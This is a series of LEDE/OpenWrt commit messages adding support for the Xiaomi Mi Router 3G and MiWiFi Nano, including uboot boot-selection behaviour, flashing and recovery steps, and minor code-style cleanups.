- Swapped order of vlan interfaces (eth0.1 & eth0.2) to match stock vlan
layout. eth0.1 is LAN, eth0.2 is WAN
- Add 'lwlll' vlan layout to mt7530 switch driver to prevent packet
leakage between kernel switch init and uci swconfig
uboot behaviour & system 'recovery'
uboot expects to find bootable kernels at nand addresses 0x200000 &
0x600000 known by uboot as "system 1" and "system 2" respectively.
uboot chooses which system to hand control to based on 3 environment
variables: flag_last_success, flag_try_sys1_failed & flag_try_sys2_failed
last_success represents a preference for a particular system and is set
to 0 for system 1, set to 1 for system 2. last_success is considered *if*
and only if both try_sys'n'_failed flags are 0 (ie. unset) If *either*
failed flags are set then uboot will attempt to hand control to the
non failed system. If both failed flags are set then uboot will check
the uImage CRC of system 1 and hand control to it if ok. If the uImage
CRC of system is not ok, uboot will hand control to system 2
irrespective of system 2's uImage CRC.
NOTE: uboot only ever sets failed flags, it *never* clears them. uboot
sets a system's failed flag if that system's was selected for boot but
the uImage CRC is incorrect.
Fortunately with serial console access, uboot provides the ability to
boot an initramfs image transferred via tftp, similarly an image may
be flashed to nand however it will flash to *both* kernels so a backup
of stock kernel image is suggested. Note that the suggested install
procedure below set's system 1's failed flag (stock) thus uboot ignores
the last_success preference and boots LEDE located in system 2.
Considerable thought has gone into whether LEDE should replace both
kernels, only one (and which one) etc. LEDE kernels do not include a
minimal rootfs and thus unlike the stock kernel cannot include a
method of controlling uboot environment variables in the event of
rootfs mount failure. Similarly uboot fails to provide an external
mechanism for indicating boot system failure.
Installation - from stock.
Installation through telnet/ssh:
- copy lede-ramips-mt7621-mir3g-squashfs-kernel1.bin and
lede-ramips-mt7621-mir3g-squashfs-rootfs0.bin to usb disk or wget it
from LEDE download site to /tmp
- switch to /extdisks/sda1/ (if copied to USB drive) or to /tmp if
wgetted from LEDE download site
- run: mtd write lede-ramips-mt7621-mir3g-squashfs-kernel1.bin kernel1
- run: mtd write lede-ramips-mt7621-mir3g-squashfs-rootfs0.bin rootfs0
- run: nvram set flag_try_sys1_failed=1
- run: nvram commit
- run: reboot
Recovery - to stock.
Assuming you used the above installation instructions you will have a
stock kernel image in system 1. If it can be booted then it may be used
to perform a stock firmware recovery, thus erasing LEDE completely. From
a 'working' LEDE state (even failsafe)
Failsafe only:
- run: mount_root
- run: sh /etc/uci-defaults/30_uboot-envtools
Then do the steps for 'All'
All:
- run: fw_setenv flag_try_sys2_failed 1
- run: reboot
The board will reboot into system 1 (stock basic kernel) and wait with
system red light slowly blinking for a FAT formatted usb stick with a
recovery image to be inserted. Press and hold the reset button for
around 1 second. Status LED will turn yellow during recovery and blue
when recovery complete.
Signed-off-by: Kevin Darbyshire-Bryant <ldir@darbyshire-bryant.me.uk>
Use fixed led names and add each board variant instead of manipulating
the board name.
It makes the ramips board name function less different to the one used
in other targets and allows to merge them with a common function.
Signed-off-by: Mathias Kresin <dev@kresin.me>
Few minor code formatting style fixes, including:
- keep one board per line
- always use "|\" (for consistency)
- remove redundant double quotes and empty lines
Signed-off-by: Piotr Dymacz <pepe2k@gmail.com>
Xiaomi MiWiFi Nano is based on Mediatek MT7628 with 64MB ram 16MB flash
Signed-off-by: Noble Pepper <openwrtmail@noblepepper.com>
v3 includes changes suggested by L. D. Pinney & Karl Palsson-
Eliminate en25q64 (4MB) flash chip
Alphabetization
Remove hyphen in model
Rename profile from miwifinano.mk to xiaomi.mk
Add gpios that are attached to leds
SVN-Revision: 49024